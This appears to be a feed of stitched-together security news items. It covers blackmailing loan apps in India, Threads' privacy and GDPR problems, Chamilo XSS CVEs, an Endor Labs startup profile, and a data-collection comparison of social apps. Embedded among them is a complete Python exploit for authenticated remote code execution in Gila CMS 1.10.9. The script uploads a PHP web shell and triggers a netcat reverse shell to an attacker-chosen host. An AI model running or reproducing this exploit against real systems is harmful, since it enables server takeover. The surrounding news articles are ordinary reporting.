Categories: Personal
Tags: app

Tags:  finance

Tags:  india

Tags:  loan

Tags:  rogue

Tags:  Apple Store

Tags:  play store

Tags:  google

Tags:  threaten

Tags:  blackmail

Tags:  sextortion

Tags:  fake

Tags:  deepfake

Tags:  deepfakes

Tags:  morph

Multiple finance apps have been removed from the App Store after making dubious charges and issuing blackmail threats and other awful behavior.



(Read more...)




The post Threatening rogue finance apps removed from the Apple Store appeared first on Malwarebytes Labs.

Multiple apps have been removed from the App Store in India after a large helping of unethical behaviour was aimed at their users. TechCrunch reports that “Pocket Kash, White Kash, Golden Kash, and OK Rupee” among others were taken down after getting close to the top 20 finance app listing spots. The reason? These finance apps came with dubious charges and a chilling line in blackmail and threatening behaviour.

Here’s a user review from a month or so ago:

> “I borrowed an amount in a helpless situation and \[…\] a day before repayment due date I got some messages with my pic and my contacts in my phone saying that repay your loan otherwise they will inform our contacts that you r not paying loan."

While this sets the scene for the behaviour which ultimately had the apps taken down, worse was still to come.

Someone reached out to an individual working in media with a very disturbing message related to one of the apps. In it, their friend’s sister took out a loan and was met with threats to send “her nude pics” to her contacts. The nudes weren’t real: they’d been “morphed”, according to the message sender. We assume they mean a deepfake, which are of course notoriously easy to create either via specialist websites or apps.

> Wtf is this, a personal loan app called Kash is threatening to send morphed nude photos of their customer to her entire contact list?! pic.twitter.com/5LcsukVgef
> 
> — Sandhya Ramesh (@sandygrains) July 3, 2023

Some of the apps were also impersonating legitimate app developers, which means lots of time and hassle spent trying to prove that they’re not involved. This is a common scam, so much so that large lists have been compiled of apps suspected of being involved in this particular tactic of blackmail and threatening behaviour.

Back in March, “seven entities and five individuals” were charged in a similar case where an individual was threatened after taking out a loan. Obscene and intimidating messages were sent to the victim by SMS, apps, and phone calls along with threats to upload photographs to adult websites.

Meanwhile, there are a growing number of faked nude photos ending up in the news in relation to these bogus finance apps. Sadly, there are also reports of some victims committing suicide after becoming caught in these fraudulent activities. In the above link, the fake finance apps are on the Google Play store. The bogus app developers are clearly looking to cast as wide a net as possible in their quest for ill-gotten gains. In some cases, fakers will impersonate senior law enforcement officers on rogue websites to make the scam even more convincing.

Apple has pulled “at least” half a dozen apps, but it’s clear that this is a bit of a booming industry and will take a lot of work to stamp out completely. If you’re thinking about taking out a loan via an app, it’s worth taking the time to research which companies are legitimate and take things from there. Check the reputation of the organisation, read those reviews, and find out what level of cover is available from both the store and lender should things go wrong. Do your best to ensure everything is above board before committing to anything, as this definitely isn’t something you want to become tangled up in.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Threatening rogue finance apps removed from the Apple Store

GDPR is halting Meta's new Threads app from entering EU markets, portending a broader struggle over the right ways to collect user data on social apps.

Upcoming data privacy regulations are preventing Meta's new microblogging app "Threads" from launching in European Union (EU) markets. Experts say this is only the beginning of the privacy battle facing the Twitter clone.

Meta's attempted coup d'etat against the Twitter kingdom launched on Wednesday in over 100 countries, earning tens of millions of users in only its first day live. That, despite being unavailable to major markets within the EU.

The holdup has to do with "complexities with complying with some of the laws coming into effect next year," Instagram CEO Adam Mosseri hinted on July 5. Mosseri's statement may refer to the new antitrust-oriented Digital Markets Act, but experts also expect Threads to collide head-on with consumer privacy regulations, thanks to its wanton collection of just about every kind of personal data imaginable.

    

Source: Search Engine Journal

"It seems likely that they're worried about the risk of rolling out something new that very clearly violates General Data Protection Regulation (GDPR) guidelines," says Aaron Mendes, CEO and co-founder of PrivacyHawk. But Threads' slow rollout doesn't preclude it from flourishing in the future. "Facebook has a reputation of rolling things out over time — they like to get stuff out fast, and then get information in and iterate."

**Everything Threads Will Know About You**

Meta has a history of conflict with regulators, owing to its liberal approach to consumer privacy. The EU has already fined the media giant to the tune of nine figures or more on multiple occasions.

Judging by its entry in the Apple app store, it's no wonder that Threads is being shielded from EU scrutiny. Browsing history, geolocations, health and financial information, and much more are all up for grabs. There's even a dedicated category for "sensitive information" which, according to Apple's documentation, includes "racial or ethnic data, sexual orientation, pregnancy or childbirth information, disability, religious or philosophical beliefs, trade union membership, political opinion, genetic information, or biometric data."

According to Mendes, there's no reason for users to suddenly freak out. For one thing, even the most egregious data collectors now provide settings for users to toggle what kinds of information they're willing to divulge. And at the end of the day, he points out, "Threads is effectively Instagram. You use Instagram to log into it. So it's all the same data collection, all the same protocols."

Threads does distinguish itself from its parent platform in its supplemental privacy policy. One rule of particular note: It'll only be possible to delete a Threads account by deleting the Instagram account associated with it.

Few of the tens of millions of people who've already signed up for Threads — or the hundreds of millions to come — are likely to know about this rule before it's too late. It just goes to show how "the customers are very, very disempowered," says Jim Killock, executive director of the Open Rights Group. "It's worth remembering that people have invested thousands and thousands of hours into building their networks on these platforms. We wouldn't tolerate this sort of behavior anywhere else."

**Can Meta Keep Up With GDPR?**

Even those who hold no quarter for Meta's approach to privacy may find certain GDPR regulations overly restrictive.

"EU laws make it very difficult to roll out a product, because of how they handle data sharing outside of EU borders," Mendes says. In May, for example, Meta got handed a colossal 1.3 billion Euro fine for transferring EU citizens' data to US servers, "which is kind of required to operate a service."

Initially, the Privacy Shield program provided a framework for data transfer between the US and EU, but the European Court of Justice struck it down on July 16, 2020. A new Trans-Atlantic Data Privacy Framework was agreed on in March, but hasn't been enacted yet.

Even if the EU has good reason to want to maintain legal control over its citizens' data, Mendes says, it's unduly difficult for global brands to keep all their data in one place, "unless you create a copy of your product that's completely siloed and works in the EU, separate from the one that you have, let's say, in the United States, which is an engineering nightmare, because now you have to maintain two versions of your product."

"There's never a simple balance," Killock admits. "It's about respecting the desires of customers on one hand, and on the other hand ensuring that companies can do business."

In some cases, he says, rules can help both regulators and users without being overly restrictive to companies. He points to the UK's right to data portability law as a way to foster competition, and naturally discourage Meta's more unsavory practices. "Whether we're talking about moderation standards or privacy standards, it allows people escape routes, and that creates actual commercial pressure on these companies to behave better."

"That," he thinks, "will empower not just users but also regulators to say: 'Look, people don't like this practice, you shouldn't be doing it."

Meta's Rush to Topple Twitter Sets Up Looming Privacy Debate

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the classes/usergroups management section.

CVE-2023-37067: Security issues - Chamilo LMS

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the session category management section.

CVE-2023-37065: Security issues - Chamilo LMS

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the extra fields management section.

CVE-2023-37064: Security issues - Chamilo LMS

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the skills wheel.

CVE-2023-37066: Security issues - Chamilo LMS

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the careers & promotions management section.

CVE-2023-37063: Security issues - Chamilo LMS

The company, one of four finalists in Black Hat USA's 2023 startup competition, looks for the vulnerabilities an attacker could actually access.

As the Log4j vulnerability demonstrated in a visceral way, open source code is inextricable from modern software. Developers incorporate components, snippets, and libraries from sources like GitHub when writing their own programs so they don't have to reinvent the wheel every time they build a cart. But that means most software has dependencies even its developers don't know about, which can lead to not realizing when a vulnerability report applies to their mission-critical applications — or to scrambling to fix a severe vulnerability that is completely cut off from any source code and thus harmless.

"With 90% of code in modern applications being open source and 95% of vulnerabilities being found in transitive dependencies \[the software packages automatically brought in by OSS\], security teams struggle to prioritize the right risks for engineering to work on," says Endor Labs CEO and co-founder Varun Badhwar. And that's the company's focus: prioritizing risk across open source software, CI/CD pipelines, and secrets.

Endor does this using dependency life cycle management, which takes into account a variety of metrics to calculate an overall risk score that a company can use to set security policies. It emphasizes how a dependency is used in the organization rather than the severity of a vulnerability. Even the worst vuln, the thinking goes, doesn't matters if an attacker can't actually get to it.

**Why Reachability Analysis?**

The company calls its approach "reachability analysis." By building a complete inventory of software and then tracing every path to a vulnerability, Endor says it can determine which vulnerabilities need to be fixed right away and which can be set aside. Users can query the Endor Labs platform using DroidGPT, a chatbot that is now in beta, to figure out which open source package they can use in place of a more vulnerable one.

Where Endor really stands out, Badhwar says, is with its staff: A third of the R&D team have earned doctorates. The focus on specialization carries through to the company's "decision to tackle one problem at a time to solve it in the right way," he says.

    

DroidGPT search results for cryptographic packages in Go. (Source: Endor Labs)

That first problem was open source dependencies. "We made the decision to start there and invest heavily in reachability analysis before we move forward into other solutions," Badhwar says.

The next focus areas will be prioritized secret scanning and supply chain management/configuration posture management, he adds.

**Return of the Contest**

The four finalists in the Black Hat Startup Spotlight — Endor Labs, Gomboc, Binarly, and Mobb — will present their business models to a panel of judges at the Mandalay Bay in Las Vegas on Wednesday, Aug. 9. (Of the finalists, Endor Labs is the only one that also made the finals at the 2023 RSAC Innovation Sandbox.) Dark Reading's editor-in-chief, Kelly Jackson Higgins, will host the event, which begin at 4:30 p.m. PT.

If you're attending Black Hat in person, Endor Labs hopes to attract you to its booth with a platform demo, a cute mascot, and Star Wars keychain/bottle openers. You might also get an invite to Endor Labs' event at the Topgolf driving range and sports bar.

Speaking of Endor, the swag is a clue to the inspiration for the company's name. No, it doesn't refer to the Canaanite village where the biblical Saul consulted a witch. In this case, Endor is the forest moon in the Star Wars universe where Ewoks live. The company's security research team is even named "Station 9" after a research station on Endor.

As Badhwar says, "The story behind the name is simple — we're just huge nerds."

**Speed Round**

**Website:** https://www.endorlabs.com/  
**Founded:** 2022  
**Funding stage:** Seed  
**Total funding raised so far:** $25M  
**Number of employees:** 50  
**If the company were a band, what would its band name be, and what kind of band would it be:** "We would simply be named The Ewoks and play futuristic synth-rock."  
**Pineapple on pizza, yea or nay?:** "We posted this question to the company Slack, and it almost sparked a civil war, but the result was an exact 50/50 split, which our marketing team will break and decide YES on pineapple on pizza." — Thuy Nguyen, director of demand generation at Endor Labs

Startup Spotlight: Endor Labs Focuses on Reachability

Gila CMS version 1.10.9 suffers from a remote code execution vulnerability.

    # Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)# Date: 05-07-2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://gilacms.com/# Software Link: https://github.com/GilaCMS/gila/# Version: Gila 1.10.9# Tested on: Linuximport requestsfrom termcolor import coloredfrom urllib.parse import urlparse# Print ASCII artascii_art = """ ██████╗ ██╗██╗      █████╗      ██████╗███╗   ███╗███████╗    ██████╗  ██████╗███████╗██╔════╝ ██║██║     ██╔══██╗    ██╔════╝████╗ ████║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║  ███╗██║██║     ███████║    ██║     ██╔████╔██║███████╗    ██████╔╝██║     █████╗  ██║   ██║██║██║     ██╔══██║    ██║     ██║╚██╔╝██║╚════██║    ██╔══██╗██║     ██╔══╝  ╚██████╔╝██║███████╗██║  ██║    ╚██████╗██║ ╚═╝ ██║███████║    ██║  ██║╚██████╗███████╗ ╚═════╝ ╚═╝╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝     ╚═╝╚══════╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝                              by Unknown_Exploit"""print(colored(ascii_art, "green"))# Prompt user for target URLtarget_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")# Extract domain from target URLparsed_url = urlparse(target_url)domain = parsed_url.netloctarget_url_2 = f"http://{domain}/"# Prompt user for login credentialsusername = input("Enter the email: ")password = input("Enter the password: ")# Create a session and perform loginsession = requests.Session()login_payload = {    'action': 'login',    'username': username,    'password': password}response = session.post(target_url, data=login_payload)cookie = response.cookies.get_dict()var1 = cookie['PHPSESSID']var2 = cookie['GSESSIONID']# Prompt user for local IP and portlhost = input("Enter the local IP (LHOST): ")lport = input("Enter the local port (LPORT): ")# Construct the payloadpayload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"# Perform file upload using POST requestupload_url = f"{target_url_2}fm/upload"upload_headers = {    "Host": domain,    "Content-Length": "424",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",    "Accept": "*/*",    "Origin": target_url_2,    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",    "Connection": "close"}upload_data = f'''------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"Content-Type: application/x-php<?php system($_GET["cmd"]);?>------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="path"tmp------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="g_response"content------WebKitFormBoundarynKy5BIIJQcZC80i2--'''upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)if upload_response.status_code == 200:    print("File uploaded successfully.")    # Execute payload    response = session.get(payload_url)    print("Payload executed successfully.")else:    print("Error uploading the file:", upload_response.text)

Gila CMS 1.10.9 Remote Code Execution

Want to try out Meta’s new social media app? Here’s more context on what personal data is collected by Threads and similar social media apps.

Meta's long-awaited Twitter alternative is here, and it's called Threads. The new social media app launches at a time when alternatives, like Bluesky, Mastodon, and Spill, are vying for users who are dissatisfied with Elon Musk's handling of Twitter's user experience, with its newly introduced rate limits and an uptick in hate speech.

Meta owns Facebook, Instagram, and WhatsApp, so the company’s attempt to recreate an online experience similar to Twitter is likely to attract plenty of normies, lurkers, and nomadic shitposters. Threads uses the AT Protocol developed by Bluesky, and Meta is working to incorporate Threads as part of the online Fediverse, a group of shared servers where users can interact across multiple platforms.

If you’re hesitant to share your personal data with a company on the receiving end of a billion dollar fine, that’s understandable. For those who are curious, however, here’s what we know about the service’s privacy policy, what data you hand over when you sign up, and how it compares to the data collected by other options.

Threads

Threads (Android, Apple) potentially collects a wide assortment of personal data that remains connected to you, based on the information available in Apple’s App Store, from your purchase history and physical address to your browsing history and health information. “Sensitive information” is also listed as a type of data collected by the Threads app. Some information this could include is your race, sexual orientation, pregnancy status, and religion as well as your biometric data.

Threads falls under the larger privacy policy covering Meta’s other social media platforms. Want to see the whole thing? You can read it for yourself here. There’s one caveat, though. The app has a supplemental privacy policy that’s also worth reading. A noteworthy detail from this document is that while you’re able to deactivate your Threads account whenever, you must delete your Instagram if you fully want to delete your Threads account.

Below is all the data collected by Threads that’s mentioned in the App Store. Do you have the Facebook or Instagram app on your phone? Keep in mind that this data collection by Meta is comparable to the data those apps collect about you.

For Android users, the Google Play Store doesn’t require you to hand over the same amount of extensive data to try out Threads. You have more control than Apple users, since you can granularly toggle what personal data is shared with apps.

Data Linked to You

**Third-Party Advertising:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Developer's Advertising or Marketing:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ ( Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Analytics:**

*   _Health & Fitness_ (Health, Fitness)
*   _Purchases_ (Purchase History, Financial Info, Payment Info, Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   Contacts
*   _User Content_ (Photos or Videos, Audio Data, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Product Personalization:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   Contacts
*   _User Content_ (Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**App Functionality:**

*   _Health & Fitness_ (Health, Fitness)
*   _Purchases_ (Purchase History)
*   _Financial Info_ (Payment Info, Credit Info, Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Other Purposes:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Photos or Videos, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

Bluesky

Looking for an app that collects less personal data? Bluesky (Android, Apple) is a buzzy Twitter alternative started by Twitter founder Jack Dorsey and managed by CEO Jay Graber. Bluesky uses the AT Protocol that it created. Like Mastodon already does and Threads soon will, Bluesky incorporates the Fediverse servers as its backbone. The app is currently invite-only, but it does not currently collect anywhere near as much information as Threads or Twitter.

For Bluesky, the data that’s linked to you is focused on app functionality, like remembering your email and user ID, or access to photos and videos on your device so you can post memes. Here’s where you can find more info about Bluesky’s privacy policy. Keep in mind the service is still new and adding features, so there will likely be changes as it evolves.

Below is all the data collected by Bluesky that’s mentioned in the App Store. (Remember that this is only for iPhone owners. If you use an Android smartphone, you have more control over what data is shared.)

Data Linked to You

**App Functionality:**

*   _Contact Info_ (Email Address)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)

Data Not Linked to You

**Analytics:**

*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**App Functionality:**

*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

Mastodon

What if you want a social media app that doesn’t suck up all your personal data? **Mastodon** (Android, Apple) might be a good option for you. Originally launched in 2016 by Eugen Rochko, Mastodon uses a decentralized protocol that’s different from Threads and Bluesky, called ActivityPub. It’s part of the Fediverse of shared servers. Mastodon is not exactly a new pick; it has positioned itself for years as an alternative to Twitter. (Remember, 2023 isn’t the first time users have considered ditching Twitter for something new and exciting.)

Are you trying it out for the first time? Here’s a great guide to getting started on Mastodon. There’s a bit of a learning curve with this one.

Below is all the data collected by Mastodon that’s mentioned in the App Store.

_\*In the style of Taylor Swift.\*_

\[Blank Space\]

That's right, the Mastodon app for iOS won't collect any data from your device. For Android owners, the app may share your name and email address with other companies.

If you don't like the official Mastodon apps for any reason, you can always try alternative apps with unique interfaces and features. Just be on the lookout for the privacy policies and data collection for those apps, since they don't have to commit to zero-data collection the way the official ones do.

Spill

Are you part of (or a fan of) Black Twitter and on the search for a new posting platform, preferably one that’s inclusive and voicey? Spill (Apple) is a Black-owned social media app that’s made with diverse communities in mind, specifically people of color. It was founded by Alphonzo “Phonz” Terrell and Devaris Brown, who both used to work at Twitter, and it launched earlier this year. Spill is not part of the Fediverse of shared servers.

Spill is currently invite-only, but you can sign up for the waiting list. While Spill does gather sensitive info, the other aspects of its data collection are not as extensive as Threads. Here’s the full privacy policy you can read over.

Below is all the data collected by Spill that’s mentioned in the App Store. It’s worth noting that Spill’s dev team is working on an Android app, but it’s not yet available to use.

Data Linked to You

**Developer's Advertising or Marketing:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Analytics:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Product Personalization:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**App Functionality:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Other Purposes:**

*   _Contact Info_ (Email Address, Phone Number)

Hive Social

It’s a bit smaller than other platforms, but Hive Social (Android, Apple) is another contender for your attention span that’s particularly popular with gamers. This app is not part of the Fediverse. Nostalgic for the days when curated music would automatically play when a person visited your profile? This feature is one way Hive differentiates itself from Twitter, along with a built-in Q&A feature that lets your followers ask you questions (sometimes anonymously) that you can answer in posts to your feed. Want to give Hive a try? Check out our guide with tips for getting started.

The app collects information about you for functionality and analytics, but it’s not connected specifically to you. Learn more about what data the app uses by taking a look at its privacy policy.

Below is all the data collected by Hive Social that’s mentioned in the App Store for iPhone owners. (Have a Google Pixel or other Android device in your pocket? You can go into your privacy settings for more control over what data Hive collects.)

Data Not Linked to You

**Analytics:**

*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)
*   _Usage Data_ (Product Interaction, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**App Functionality:**

*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)
*   _Usage Data_ (Product Interaction, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

What About Twitter?

It may seem like Threads collects a ton of personal data. (Because it does!) For more context, let’s go over what Twitter asks for as well. Twitter (Android, Apple) keeps plenty of data that’s linked to users and used to track you, like your purchase history and browsing history. With that in mind, the app does not list “sensitive information” as one of the disclosed categories of data collection. Check out its full privacy policy for an in-depth breakdown.

Below is all the data collected by Twitter that’s mentioned in the App Store. (Escaped from Apple’s walled garden? The Android app for Twitter still collects some personal data, like your precise location and web browsing history, unless you adjust your privacy settings.)

Data Used to Track You

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _User Content_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)

Data Linked to You

**Third-Party Advertising:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Performance Data)

**Developer's Advertising or Marketing:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _User Content_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)

**Analytics:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contacts_
*   _User Content_ (Photos or Videos, Audio Data, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Crash Data, Performance Data)

**Product Personalization:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address, Phone Number)
*   _Contacts_
*   _User Content_
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**Other Purposes:**

*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Photos or Videos)
*   Search History
*   _Identifiers_ (User ID)

Data Not Linked to You

**Third-Party Advertising:**

*   _Other Data_

**Developer's Advertising or Marketing:**

*   _Other Data_

**Analytics:**

*   _User Content_ (Emails or Text Messages)
*   _Other Data_

**App Functionality:**

*   _Contact Info_ (Physical Address)
*   _User Content_ (Emails or Text Messages)
*   _Other Data_

Tag

#apple